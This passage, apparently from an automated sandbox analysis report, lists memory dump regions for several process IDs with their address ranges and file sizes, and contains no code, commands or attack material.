                                                                                                                                                                    • memory/1604-16-0x000001D1EB220000-0x000001D1EB242000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      136KB

                                                                                                                                                                    • memory/2672-30-0x00000000061F0000-0x000000000622C000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      240KB

                                                                                                                                                                    • memory/2672-29-0x00000000053F0000-0x0000000005402000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      72KB

                                                                                                                                                                    • memory/2672-28-0x0000000004F30000-0x0000000004F96000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      408KB

                                                                                                                                                                    • memory/2672-27-0x0000000004E90000-0x0000000004F22000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      584KB

                                                                                                                                                                    • memory/2672-26-0x0000000005440000-0x00000000059E4000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      5.6MB

                                                                                                                                                                    • memory/2672-25-0x0000000000420000-0x000000000048C000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      432KB

                                                                                                                                                                    • memory/3780-77-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      32KB

                                                                                                                                                                    • memory/3780-75-0x00007FFB3C8B0000-0x00007FFB3CAA5000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      2.0MB

                                                                                                                                                                    • memory/3780-76-0x00007FFB3BAA0000-0x00007FFB3BB5E000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      760KB

                                                                                                                                                                    • memory/3780-72-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      32KB

                                                                                                                                                                    • memory/3780-67-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      32KB

                                                                                                                                                                    • memory/3780-68-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      32KB

                                                                                                                                                                    • memory/3780-69-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      32KB

                                                                                                                                                                    • memory/3780-70-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      32KB

                                                                                                                                                                    • memory/4028-65-0x00007FFB3C8B0000-0x00007FFB3CAA5000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      2.0MB

                                                                                                                                                                    • memory/4028-66-0x00007FFB3BAA0000-0x00007FFB3BB5E000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      760KB

                                                                                                                                                                    • memory/4028-64-0x0000011919A50000-0x0000011919A7A000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      168KB

                                                                                                                                                                    • memory/5012-54-0x0000000006EE0000-0x0000000006EEA000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      40KB